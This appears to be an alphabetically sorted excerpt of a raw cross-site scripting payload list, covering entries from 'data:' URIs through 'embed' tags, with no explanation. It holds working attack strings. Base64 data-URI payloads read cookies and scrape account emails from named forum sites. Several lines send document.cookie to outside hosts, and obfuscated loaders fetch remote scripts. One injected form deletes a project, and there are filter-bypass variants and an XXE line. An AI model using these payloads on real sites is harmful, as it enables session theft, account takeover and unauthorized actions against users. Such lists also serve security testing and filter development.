data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe2FsZXJ0KGRvY3VtZW50LmZyYW1lc1swXS5kb2N1bWVudC5jb29raWUpfWZ1bmN0aW9uIGIoKXt2YXIgaT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpZnJhbWUnKTtpLnN0eWxlPSd3aWR0aDowcHg7aGVpZ2h0OjBweDt2aXNpYmlsaXR5OmhpZGRlbic7aS5zcmMgPSAnaHR0cHM6Ly9yZG90Lm9yZy9mb3J1bS9jbGllbnRzY3JpcHQvdmJ1bGxldGluX3JlYWRfbWFya2VyLmpzJztpLm9ubG9hZD1mdW5jdGlvbigpe2EoKX07ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpKX08L3NjcmlwdD48Ym9keSBvbmxvYWQ9YigpPg==
data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe3ZhciB4PW5ldyBYTUxIdHRwUmVxdWVzdDt4Lm9wZW4oJ0dFVCcsJ2h0dHAnKyhkb2N1bWVudC5yZWZlcnJlci5sZW5ndGggPyAnJyA6ICdzJykrJzovL2ZvcnVtLmFudGljaGF0LnJ1L3Byb2ZpbGUucGhwP2RvPWVkaXRwYXNzd29yZCcsZmFsc2UpO3guc2VuZChudWxsKTthbGVydCh4LnJlc3BvbnNlVGV4dC5tYXRjaCgvbmFtZT0iZW1haWwiIHZhbHVlPSIoLis/KSIvKVsxXSl9PC9zY3JpcHQ+PGJvZHkgb25sb2FkPWEoKT4=
data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe3ZhciB4PW5ldyBYTUxIdHRwUmVxdWVzdDt4Lm9wZW4oJ0dFVCcsJ2h0dHBzOi8vcmRvdC5vcmcvZm9ydW0vcHJvZmlsZS5waHA/ZG89ZWRpdHBhc3N3b3JkJyxmYWxzZSk7eC5zZW5kKG51bGwpO2FsZXJ0KHgucmVzcG9uc2VUZXh0Lm1hdGNoKC9uYW1lPSJlbWFpbCIgdmFsdWU9IiguKz8pIi8pWzFdKX08L3NjcmlwdD48Ym9keSBvbmxvYWQ9YSgpPg==
data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZWxzZXthbGVydChkb2N1bWVudC5kb21haW4pfTwvc2NyaXB0Pg==
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
data:text/html;charset=utf-8,<h1>abc
data:text/html,<iframe src=javascript:alert(1)>
data:text/html,<img src=1 onerror=alert(1)>
#data:text/html,<img src=1 onerror=alert(document.domain)
data:text/html,/*<img src=x ‘-alert(1)-’ onerror=alert(1)>*/alert(1)
data:text/html,/*<img src=x ‘-confirm(1)-’ onerror=confirm(1)>*/confirm(1)
data:text/html,<script>alert(0)</script>
data:text/html,< sc r i p t >alert(1)</sc r ip t>
data:text/html,<script>alert(1)</script>//
data:text/html,<script>alert(1)</script>
data:text/html,<script>confirm(0);confirm(1);location.reload();</script>
data:text/html,<svg onload=alert(1)>
data:text/html,<svg onload=alert(/@irsdl/)></svg>
data://text/javascript,alert(‘xss’)
Data URl
d.body.appendChild(z)
d.body.appendChild(z)},0)>
d=document;
_.defer(alert, 9)
.__defineGetter__.constructor(‘[].constructor.
defineSetter(‘x’,confirm); x=1;
_.delay(alert, 0, 9)
delete~[a=confirm]/delete a(1)
delete [a=confirm],delete a(1)
delete confirm(1)
delete [][‘__proto__’][‘toString’];[][‘__proto__’][Symbol.toStringTag]=’=alert(1)’;eval([1,2,3]+’’);
delFeedback(‘&apos;)alert(1)’
<details onfocus = “alert(1)”>
<details ontoggle=alert(1)>
<details ontoggle=”aler\u0074(1)”>
“><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
<details open ontoggle=”alert(1)”>
<details open ontoggle=alert(1)>
<details/open/ontoggle=”alert`1`”>
><detials ontoggle=confirm(0)>
��><detials ontoggle=confirm(0)>
<dialog open=”” onclose=”alert(1)”><form
<dialog open=”” onclose=”alert(1)”><form method=”dialog”><button>Close me!</button></form></dialog>
display:block;color:transparent;
<div>
<div%20id=a%20style=float:left%20onfocus=alert(1)>#a
<div%20id=”a”%20style=-ms-block-progression:bt%20onfocus=alert(1)>#a
<div%20id=a%20style=-ms-layout-flow:vertical-ideographic%20onfocus=alert(1)>#a
<div%20style=-webkit-user-modify:read-write%20onfocus=alert(1)%20id=x>#x
<%div%20style=xss:expression(prompt(1))>
<DIV><A></A>
<div> <a href=/**/alert(15)>XSS</a><base href=”javascript:\ </div><div id=”x”></div>
<div> <a href=/**/alert(1)>XSS</a><base href=”javascript:\ </div><div id=”x”></div>
<div>`-alert(1)</script><script>`</div>
<div>`-alert(4)</script><script>`</div>
<div><base href=//cors.l0.cm/</div><script src=/test.js></script>
<div><base href=//evil/</div>
<div><base href=//evil/ </div>
<div><base href=”javascript:/”><a href=/**/alert(1)>XSS</a></div>
<div><base href=”javascript:\”><a href=/**/alert(1)>XSS</a></div>
<div><base/href=javascript:/><a href=/*’”+-/%~.,()^&$#@!*/alert(1)>XSS</a></div>
<div class=”qm_left” style=”position:relative;z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=’//xss.tw/2180',sizingMethod=’scale’);width:40px;height:40px;”>
<div contenteditable onresize=”alert(1)”></div>
<div contextmenu=x>right-click<menu id=x onshow=confirm(1)>
<div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”alert(1)”>
<div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”[DATA]”>
div data-bind=”foo: “ /div
div data-bind=”html:’hello bworld /b’” /div
div data-bind=”html:’ script src=”//evil.com” /script’” /div
div data-bind=”value:’hello world’”?/div
div data-dojo-type=”dijit/Declaration”data-dojo-props=”} — {“
<div datafld=”b” dataformatas=”html” dataid=XSS SRC=”#XSS”></div>
<div datafld=”b” dataformatas=”html” datasrc=”#X”></div>
div data-role=”button”data-text=”I am a button” /div
div data-role=”button”data-text=” script /script” /div
div data-role=popup id=’ — script /script’?/div
div data-toggle=tooltip data-html=true title=’script /script’ /div
div data-toggle=tooltip title=’I am atooltip!’some text /div
</div><div id=”x”>AAA</div>
<div draggable=”true” ondragstart=”event.dataTransfer.setData(‘text/plain’, ‘Evil data’)><h3>DRAG ME!!</h3></div>
<div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>
<div><embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/</div><div id=”x”>AAA</div>
<div> <embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/ </div><div id=”x”></div>
<div id=”alert(/@0x6D6172696F/)” style=”x:expression(eval)(id)”>
<div id=”confirm(2)” style=”x:expression(eval)(id)”>
<div id=d><div style=”font-family:’sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B’”>X</div></div>
<div id=d><div style=”font-family:’sans\27\3B color\3Ared\3B’”>X</div></div>
<div id=d><div style=”font-family:’sans\27\3B color\3Ared\3B’”>X</div></div> <script>with(document.getElementById(“d”))innerHTML=innerHTML</script>
<div id=”div1"><input value=”``onmouseover=alert(1)”></div> <div id=”div2"></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
<div id=”div1"><input value=”``onmouseover=javascript:alert(1)”></div> <div id=”div2"></div>
<div id=”div1"><input value=”``onmouseover=javascript:alert(1)”></div> <div id=”div2"></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
<div id=d><x xmlns=”><body onload=alert(1)”><script>d.innerHTML=����</script>
<div id=d><x xmlns=”><iframe onload=alert(1)”></div>
<div id=d><x xmlns=’”><iframe onload=alert(2)//’></div>
<div id=d><x xmlns=”><iframe onload=javascript:alert(1)”></div> <script>d.innerHTML=d.innerHTML</script>
<div id=”myxsxxcd” style=”color:red;display:none” title=”if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}”>
<div id = “x”></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
<div id=”xss” onwebkittransitionend=”alert(1)” style=”-webkit-transition: width .1s;”></div>
<DIV id=XSS STYLE=”background-image: url(javascript:alert(‘XSS’))”>
<DIV id=XSS STYLE=”binding: url(javascript:alert(‘XSS’));”>
<div id=”xss” style=”float:left” onfocus=”alert(1)”>
<div id=”xss” style=”-ms-block-progression:bt” onfocus=”alert(1)”>
<div id=”xss” style=”-ms-layout-flow:vertical-ideographic” onfocus=”alert(1)”>
<DIV id=XSS STYLE=”width: expression(alert(‘XSS’));”>
<div id=”x”>x</div> <xml:namespace prefix=”t”> <import namespace=”t” implementation=”#default#time2"> <t:set attributeName=”innerHTML” targetElement=”x” to=”&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;”>
<div id=”x”>x</div> <xml:namespace prefix=”t”> <import namespace=”t” implementation=”#default#time2"> <t:set attributeName=”innerHTML” targetElement=”x” to=”&lt;img src=x:x onerror =javascript:alert(1)&gt;”>
<div id=”x”>XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
<div id=”x”>XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
<div>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
‘“>><div><meter onmouseover=”alert(1)”</div>”
<div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
div ng-app ng-cspng-focus=”x=$event.view.window;x.”
<div onactivate=”alert(1)” id=”xss” style=”overflow:scroll”></div>
<div onactivate=alert(‘Xss’) id=xss style=overflow:scroll>
<div onbeforescriptexecute=”alert(1)”></div>
<div onclick=”alert(‘xss’)”>
<div onfocus=”alert(1)” contenteditable tabindex=”0" id=”xss”></div>
<div onfocus=”alert(1)” id=”xss” style=”display:table”>
<div onfocus=alert(‘xx’) id=xss style=display:table>
<div onmouseenter=”alert(‘xss’)”>
<div onmousemove=”alert(200)” src=”xxxx”>
<div/onmouseover=’alert(1)’>renwa
<div/onmouseover=’alert(1)’> style=”x:”>
<div/onmouseover=’alert(1)’> style=”x:”>
<div/onmouseover=’alert(1)’>X
<div onmouseover=’alert&lpar;1&rpar;’>DIV</div>
<div onmouseover=”alert(‘XSS’);”>,
<div/onmouseover=’confirm(1)’> style=”x:”>
<div onmouseover=’confirm&lpar;1&rpar;’>DIV</div>
<div onmouseover=”document.vulnerable=true;”>
<div onmouseover=prompt(“1”)>renwa
div ref=mes.bind=”$this.me.ownerdefaultView.” /div
<div><script>alert(1)
→</div><script src=/test.js></script>
<div>”src=data:,alert%281%29></script><script x=”</div>
<div>”src=data:,alert%2824%29></script><script x=”</div>
<div style=”&#119;&#105;&#100;&#116;&#104;&#58;&#101;&#120;&#112;&#114;&#101;&#115;&#115;&#105;&#111;&#110;&#40;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#49;&#39;&#41;&#41;”>1</div>
<div style=”&#119;&#105;&#100;&#116;&#104;&#58;&#92;&#48;&#48;&#54;&#53;&#120;&#112;&#114;&#101;&#115;&#115;&#105;&#111;&#110;&#40;&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#49;&#47;&#41;&#41;”>1</div>
<div style=”\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;”>XXX</div><div style=”[a]color[b]:[c]red”>XXX</div>
<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>
<div style=”animation-name:x” onanimationstart=”alert(1)”></div>
<DIV STYLE=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
<;DIV STYLE=”;background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
<DIV STYLE=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE=”background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029 029">
<;DIV STYLE=”;background-image: url(&;#1;javascript:alert(‘;XSS’;))”;>;
<DIV ?STYLE=”background-image: ?url(&#1;javascript:alert(‘XS ?S’))”>
<DIV STYLE=”background-image: url(&#1;javascript:alert(‘XSS’))”>
<DIV STYLE=”background-image: url(&#1;javascript:confirm(5))”>
<div STYLE=”background-image: url(&#1;javascript:document.vulnerable=true;)”>
<div style=”background-image:url(javascript:alert(‘1’))”>
<DIV+STYLE=”background-image: url(javascript:alert(1))”>
<div style=”background-image:url(javascript:alert(document.cookie))”>
<DIV STYLE=”background-image: url(javascript:alert(‘X1SS’))”>
<;DIV STYLE=”;background-image: url(javascript:alert(‘;XSS’;))”;>;
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’));”>
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
<DIV STYLE=”background-image: url(javascript:alert(XSS))”>
<DIV STYLE=”background-image: url(javascript:confirm(5))”>
<div style=”background-image: url(javascript:document.vulnerable=true;);”>
<div STYLE=”background-image: url(javascript:document.vulnerable=true;)”>
<DIV STYLE=”background-image: url(javascript:javascript:alert(1))”>
<div style=”background-image:url(<script>alert(document.cookie)</script>)”>
<div style=”background:url(/f#&#127;oo/;color:red/*/foo.jpg);”>X
<div style=”background:url(/f#[a]oo/;color:red/*/foo.jpg);”>X</div>
<div style=”background:url(/f#oo/;color:red/*/foo.jpg);”>X
<div style=”background:url(/foo/;color:red/*/foo.jpg);”>X
<div style=”background:url(http://foo.f/f oo/;color:red/*/foo.jpg);”>X</div>
<div style=behavior:url(“ onclick=alert(1)//”>XSS’OR
<div style=”behaviour:url(‘http://www.how-to-hack.org/exploit.html');">
<DIV STYLE=”behaviour: url(‘http://www.how-to-hack.org/exploit.html');">
<DIV STYLE=”behaviour: url(‘http://xss.ha.ckers.org/exploit.htc');">
<div style=”behaviour: url([link to code]);”>
<div style=”binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
<div style=”binding: url([link to code]);”>
<div style=”color: ‘<’; color: expression(alert(‘XSS’))”>
<div style=”color: expression(alert(‘XSS’))”>
<div style=”color:rgb(&#039;&#039;x:expression(alert(1))”></div>
<div style=”color:rgb(‘’&#0;x:expression(alert(1))”></div>
<Div style = “color: rgb (‘’ & # 0; x: expression (alert (1))”> </ div>
<div style=”color:rgb(‘’&#0;x:expression(alert(URL=1))”></div>
<div style=”color:rgb(‘’&#0;x:expression(confirm(URL=1))”></div>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
<div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Mouse Over</div>
<div style=content:url(%(svg)s)></div>
<div style=”display:none”></div><div style=”display:none” t=”1" e=”style\/&lt;&#39;&quot;&gt;&lt;/div&gt;&quot;/ \&quot;&quot;/&lt;img src=# onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\&gt>
<div style=”display:none” style=”behavior:url(‘?1’)”
<div style=”display:none” style=”behavior:url(‘?1’)” onreadystatechange=”alert(1)”>1</div>
<div style=”font-family:’foo&#10;;color:red;’;”>LOL
<div style=”font-family:’foo&#10;;color:red;’;”>XXX
<div style=”font-family:’foo[a];color:red;’;”>XXX</div>
<div style=”font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
<div style=”font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
<div style=”font-family:’foo ;color:red;’;”>XXX
<div style=”font-family:foo}color=red;”>XXX
<div style=”font-family:foo}color=red;”>XXX</div>
<div style = “list-style-image:url(javascript:alert(xSS))”>
<div style=”list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
<div style=”list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<div style=”-moz-binding:url(http://xssor.io/0.xml#xss);x:expression((window.r!=1)?eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,48,46,106,115));document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);window.r=1;'):1);"id="inject">
<div style=”-ms-scrolllimit:1px;overflow:scroll;width:1px”
<div style=”-ms-scroll-limit:1px;overflow:scroll;width:1px” onscroll=”alert(1)”>
<div style=”-ms-scroll- limit:1px;overflow:scroll;width:1px” onscroll=alert(‘xss’)>
<div style=”-ms-scroll-limit:1px;overflow:scroll;width:1px” onscroll=alert(‘xss’)>
<DIV STYLE_NeatHtmlReplace=”background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE_NeatHtmlReplace=”background-image: url(&#1;javascript:alert(‘XSS’))”>
<DIV STYLE_NeatHtmlReplace=”background-image: url(javascript:alert(‘XSS’))”>
<DIV STYLE_NeatHtmlReplace=”width: expression(alert(‘XSS’));”>
<div style=overflow:-webkit-marquee onscroll=alert(1)>
<div style=”overflow:-webkit-marquee” onscroll=”alert(1)”></div>
<div style=”position:absolute;top:0;left:0;width:100%;height:100%” onclick=”alert(52)”>
<div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>?
<div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
<div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>?
<div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
<div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button><div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”confirm(1)”>x</button>
<div style=”position:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”confirm(1)”>x</button>?f
<div style=”visibility:hidden” style=”behavior:url(‘?2’)”
<div style=”visibility:hidden” style=”behavior:url(‘?2’)” onreadystatechange=”alert(2)”>2</div>
<div style=”-webkit-user-modify:read-write” onfocus=”alert(1)” id=”xss”>
<div style=”-webkit-user-modify:read-write-plaintext-only” onfocus=”alert(1)” id=”xss”>
<div style=”width:\0065xpressio\6e(alert(/1/))”>1</div>
<div style=”width:\0065xpression(alert(/1/))”>1</div>
<div style=width:1px;filter:glow onfilterchange=alert(1)>x
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<div style=”width:exp/**
<div style=”width:expression(alert(‘1’));”>
<div style=”width:exp/****/ression(alert(/1/))”>1</div>
<div style=”width:expression(alert(/1/))”>1</div>
<div style=”width:expression(alert(‘1’))”>1</div>
<DIV STYLE=”width:expression(alert(‘anyunix’));”>
<div style=”width:expression(alert(‘x123ss’));”>
<DIV STYLE=”width: expression(alert(‘X2SS’));”>
<;DIV STYLE=”;width: expression(alert(‘;XSS’;));”;>;
<DIV STYLE=”width: ?expression(alert(‘XSS’));”>
<DIV STYLE=”width: expression(alert(‘XSS’));”>
<DIV STYLE=”width: expression(alert(XSS));”>
<div style=”width:expression(confirm(1))”>X</div>
<div/style=”width:expression(confirm(1))”>X</div>
<div/style=”width:expression(confirm(1))”>X</div> {IE7}
<DIV STYLE=”width: expression(confirm(5));”>
<div style=”width: expression(document.vulnerable=true;);”>
<div STYLE=”width: expression(document.vulnerable=true);”>
<DIV STYLE=”width:expression(javascript:alert(1));”>
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
<div style=”x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))”>Joker</div>
<div style=”x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
<div style=”x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))”>Joker</div>
<div style=’x:anytext/**/xxxx/**/n(alert(1)) (“\”))))))expressio\”)’>aa</div>
<div style=’x:anytext/**/xxxx/**/n(confirm(1)) (“\”))))))expressio\”)’>aa</div> //
<div style=”x:expression(alert(1))”>Joker</div>
<div style=”x:expression((window.r==1)?’’:eval(‘r=1;
<div style=”x:expression((window.r==1)?’’:eval(‘r=1;
<div style=”xg-p:absolute;top:0;left:0;width:100%;height:100%” onmouseover=”prompt(1)” onclick=”alert(1)”>x</button>
<div/style==”x onclick=alert(1)//”>XSS’OR
<div style=xss:expres&#92sion(if(!window.x){alert(‘xss’);window.x=1;})></div>
<div style=x:x(“ onclick=alert(1)//”>XSS’OR
<div style=”z:exp/*anything*/res/*here*/sion(alert(1))” />
/div /template
<div title=”%&gt;&lt;/script&gt;&quot;&lt;img src=1 onerror=confirm(1)&gt;”></div>
div type=underscore/template % % /div
<div=’x=&quot;&#39&gt;&lt;iframe/onload=alert(1)&gt;’>
dnd →<script>alert(9)</script><! — %20
doc.documentElement.innerHTML+=’’;
doc=document.implementation.createHTMLDocument(‘&amp;lt;/title&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;’);
doc = new ActiveXObject(“htmlFile”);
<!doctype”:
<!DOCTYPE x[<!ENTITY x SYSTEM “http://html5sec.org/test.xxe">]><y>&x;</y>
“;document.body.addEventListener(“DOMActivate”,alert(1))//
“;document.body.addEventListener(“DOMActivate”,confirm(1))//
“;document.body.addEventListener(“DOMActivate”,prompt(1))//
document.body.appendChild(f);
document.body.appendChild(fo);
document.body.appendChild(fr);
document.body.innerHTML=(‘<\000\0i\000mg src=xx:x onerror=alert(1)>’)
document.body.innerHTML=(‘<\000\0i\000mg src=xx:x onerror=confirm(1)>’)
document.body.innerHTML=’”onerror=”alert(1)”>’.anchor(‘“><img src=’);
document.body.setAttribute(‘onclick’,’go();’);
“+document.cookie+”
document.cookie=’xss=xss;domain=.cx.’
‘() {‘document.createElement(‘img’).src=’javascript:while(1){}’
[document.domain].find(alert)>
document.domain=’qq.com’
document.getElementById(‘form_xss’).submit();
document.getElementById(“iframe1”).contentDocument.getElementsByName(“owner”)[0].getElementsByTagName(“a”)[0].href;
document.getElementById(“iframe2”).contentDocument.forms[1].token.value;
document.getElementById(“iframe”).contentDocument.getElementById(“projects-dropdown”);
document.getElementById(“test”).innerHTML =” \u003cimg src=1 onerror=alert(/xss/)\u003e”;
document.getElementById(‘text’).innerHTML = ‘Click Here Again!’;
document.getElementById(‘text’).setAttribute(‘style’,’color:red;’);
document.getElementById(‘xss_content’).value = content;
document.getElementsByName(“login”).item(0).src = http://xss.cx/
document.getElementsByTagName(‘body’)[0].appendChild(form);
document.getElementsByTagName(‘body’)[0].appendChild(frame);
document.location=”http://xss.cx/default.aspx?c=" + document.cookie
document.location=unescape(“%19Jav%09asc%09ript:https ://foobar/%250Aconfirm%25281%2529”)
‘},document.location=window.name+’//’+
document.location=window.name+’//’+
document.location=window.name%2b%27//%27%2b
$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
\”;document.vulnerable=true;;//
&{document.vulnerable=true;};
document.write(a);
document.write(doc.documentElement.innerHTML)
document.write(‘<form><input id=p type=password></form>’);setTimeout(“alert(document.getElementById(‘p’).value)”, 50)
“;document.write(‘<img sr’%2b’c=http://p42.us/x.png?'%2bdocument['cookie']%2b'>');"
“;document.write(‘<img src=http://p42.us/x.png?'%2bdocument.cookie%2b'>');"
document.write(‘<img src=”<iframe/onload=confirm(1)>\0">’)
document.writeln(‘<form width=”0" height=”0" method=”POST” action=”’+x+’adminAdvanced.do”>’); document.writeln(‘<input type=”hidden” name=”token” value=”’ + token + ‘“ />’); document.writeln(‘<input type=”hidden” name=”deletebtn” value=”Delete+project” />’); document.writeln(‘</form>’); document.forms[0].submit();
document.write(‘<? oncl?ck=&#97&#108&#101&#114&#116&#40&#49&#41>asd</?>’.toUpperCase()
document.write(“<s”,”crip”,”t>al”,”ert(“,”1)”,”</s”,”cript>”)
document.write(“<scr”+”ipt language=javascript src=http://localhost/></scr"+"ipt>");
document.write(`<script>//# sourceMappingURL=https://pkav/?${escape(document.cookie)}</script>`)
‘document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,115,58,47,47,119,119,119,46,110,48,48,112,121,46,105,111,47,101,118,105,108,46,106,115,39,62,60,47,115,99,114,105,112,116,62))’
document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,115,58,47,47,119,119,119,46,110,48,48,112,121,46,105,111,47,101,118,105,108,46,106,115,39,62,60,47,115,99,114,105,112,116,62))
document.write(String.fromCharCode(60,12,62)); ==== document.write(String.fromCharCode(<script src=http://xss.me/1></script>;));
‘document.write(String.fromCharCode(‘+”,”.join([str(ord(n)) for n in payload])+’))’
document.write(String.fromCharCode(‘+”,”.join([str(ord(n)) for n in payload])+’))
→<d/ /ondrag=co\u006efir\u006d(2)>hello.
(double reflection, single input $p)
d=x.getImageData(t*3,Y=t*120%82,2,D=3).data
dXJjZSk=
$$=’e’
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
? (%E2%84%AA).toLowerCase() => k
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80
% E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8%
(E=[A=[],g=!A+A][g[E=-~-~++A]+({}+A) [C=!!A
(E=[A=[],g=!A+A][g[E=-~-~++A]+({}+A) [C=!!A+g,a=C[A]+C[+!A],A]+a])() [g[A]+g[A+A]+C[E]+a](A)
e; alert(document.cookie); var foo=i
eat backlash: %bb”alert(1) (GBK charset)
echo $_GET[“p”];
echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
echo(‘IPT&gt;alert(\”XSS\”)&lt;/SCRIPT&gt;’); ?&gt;
<;? echo(‘;<;SCR)’;;
<? echo(‘<SCR)’;
<? echo(‘<scr)’; echo(‘ipt>alert(“XSS”)</script>’); ?>
<? echo(‘<scr)’; echo(‘ipt>alert(\”XSS\”)</script>’); ?>
<? echo(‘<SCR)’;echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
<? echo(‘<SCR)’;echo(‘IPT>document.vulnerable=true</SCRIPT>’); ?>
echo “<script>alert()</script>”
echo “<script>alert()</script>” >> /tmp/bin.bin
echo str_ireplace(“<script”, “”, $_GET[“q”]);
echo str_ireplace(“<script”,”InvalidTag”, $_GET[“r”]);
echo str_ireplace(“<script”,”<InvalidTag”, $_GET[“s”]);
echo str_replace(“ “, “”, $_GET[“q”]);
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
e = document.createElement(‘input’);
e.id = ‘xss_content’;
??�E��img src=a onerror=javascript:alert(‘test’)>�K?��
E”><img src=”x:x” onerror=”alert(0)”>
element[attribute=’<img src=x onerror=alert(‘XSS’);>
<embed%20allowscriptaccess=always+src=https:html5sec.org/test.swf
<embed allowscriptaccess=”alwalwaysays” src=”test.swf”>
<embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/
<embed code=evil.swf allowscriptaccess=always>
<embed/code=//goo.gl/nlX0P?
<embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<embed code=”http://businessinfo.co.uk/labs/xss/xss.swf"allowscriptaccess=always>
<embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
<embed code=”http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<Embed code = “http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess = always>
<embed code=”http://xss.cx/xss.swf" allowscriptaccess=always></embed>
<embed code=javascript:javascript:alert(1);></embed>
